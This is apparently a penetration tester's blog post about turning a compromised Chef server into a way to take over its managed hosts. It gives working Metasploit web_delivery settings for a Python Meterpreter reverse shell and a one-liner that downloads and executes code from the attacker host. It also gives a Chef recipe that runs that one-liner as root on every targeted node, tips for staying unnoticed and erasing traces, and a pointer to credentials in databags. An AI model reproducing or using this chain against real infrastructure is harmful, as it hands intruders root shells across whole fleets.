Cooking up shells with a compromised Chef server

I was able to compromise a Chef server on one of my recent engagements. Owning a Chef server means having the keys to the castle. I wasn’t quite sure how to go about using this tool. I’m familiar with Puppet as I’ve spent the majority of my career on the systems side. Having never run into Chef, I needed to put a little time into figuring out the fastest way to use a Chef infrastructure to shell a bunch of sensitive hosts. Here is how I went about it.

The main caveat of this writeup is that you’ve already compromised an administrative account within a Chef web interface. Administrators often fail to set the default administrative credentials. If this is the case, the Chef server home page will typically provide them for you. Sweet!

Note: All of this can, most likely, be performed from the command line. I had compromised an account through a Chef web interface and spent the majority of my time working through the gui. Please provide me your input if you know how to roll through this workflow on the command line.

Unless you have an administrative user you’re already comfortable using, create a new administrative user to upload cookbooks with.

Raining Shells with a Chef Server - Create User

Make note of the private RSA key the interface provides you after creating your new administrative user.

If you haven’t already, install Chef on your attacking box. Input the Chef URL when prompted. Use the hostname the Chef server has in its SSL certificate (not the IP address or an alias/cname) or you’ll end up with issues that preclude you from using the knife connection. You can also grab the FQDN (or get a hint) from the “Status” page on the Chef server.

apt-get install chef

Once installed, configure a knife connection to the Chef server. Make sure to input the proper URL and user name. You can choose the default setting for other options.

knife configure

Raining Shells with a Chef Server - Knife Configure

Write your private RSA key to a file within your ~/.chef directory (.pem file). Make sure to configure your ~/.chef/knife.rb file accordingly.

Raining Shells with a Chef Server - knife.rb contents

With your private key in place, download the Chef server’s certificate and verify your knife connection is functioning properly. Use the following commands to perform this.

knife ssl fetch
knife ssl check

Raining Shells with a Chef Server - knife connection

Take a quick look at the available cookbooks to ensure the knife connection is functioning properly.

knife cookbook list

Raining Shells with a Chef Server - knife connection test

At this point you need to create a cookbook with a recipe that will inevitably shell your targets. I used the following command to perform this. The command appears to be deprecated so your mileage may vary. The ‘chef’ utility was not installed so I rolled with it.

knife cookbook create evil

Raining Shells with a Chef Server - Chef cookbook creation

Go ahead and spin up a web-delivery multi-handler in Metasploit. I chose to use a python multi-handler payload due to the dominance of Linux endpoints in the network I was attacking. Obviously, if this were a network dominated by Windows endpoints you’d want to choose a different payload.

use exploit/multi/script/web_delivery
set SRVPORT 8080
set SRVHOST 192.168.0.223
set URIPATH 2w9kwS11
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.0.223
set LPORT 8443
set TARGET 0
run

Make sure to grab the resulting run script Metasploit provides you once you’ve started the multi-handler. Mine came out like the following.

python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.223:8080/2w9kwS11');exec(r.read());"

Populate your cookbook template files. All that is needed is the following within recipes/default.rb.

execute "evil_commands" do
  command "python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.223:8080/2w9kwS11');exec(r.read());\""
  user "root"
  action :run
end

Populate metadata.rb if you feel so inclined. I DO NOT use strings like ‘evil’ or ‘pwnage’ on engagements. Operation security is the name-of-the-game and I try to fly under the radar.

Raining Shells with a Chef Server - Cookbook template files

Time to upload your Cookbook to the server.

knife cookbook upload evil

Raining Shells with a Chef Server - Cookbook upload

For giggles, verify your cookbook now exists within the Chef server. You can do this on the command line or within the web interface.

knife cookbook list | grep evil

Navigate to the “Cookbooks” listing in the website.

Raining Shells with a Chef Server - Cookbook listing

Assign your cookbook’s recipe to the targets you want to shell by adding it to each node’s ‘Run List’. Go to the Node listing, click on the nodes you are interested in, and then click Edit.

Raining Shells with a Chef Server - Editing a Chef node

Locate your cookbook’s recipe in the ‘Available Recipes’ listing in the lower, left-hand column and drag it over to the ‘Run List’ column in the upper, right-hand column. Click the ‘Save Node’ button at the bottom to commit the change.

Raining Shells with a Chef Server - Recipe assignment

Voilà! Dinner is served! Kick back and watch for shells to connect.

Raining Shells with a Chef Server - Shell connections

For the sake of operation security, and once you’ve seen a shell connect, jump back into the web interface and remove the recipe from the nodes’ run lists that have successfully connected. You don’t need multiple shells spawning from the same endpoints.

As always, once you’ve wrapped up your work and documented your efforts, go back and remove any trace of your existence within the systems you’ve interacted with. Kill your Meterpreter sessions, remove the administrative user you created, and delete your cookbook. The former and latter can be accomplished via the following commands.

Within Metasploit:

sessions -K

From the host with your knife connection:

knife cookbook delete evil

Additional Notes

While you’re in a Chef web interface, it behooves you to look around in the Databags and Cookbooks for various bits of important information. Credentials and encryption keys are often found contained with them. Among other things.

Tagged , ,

Leave a Reply

Your email address will not be published. Required fields are marked *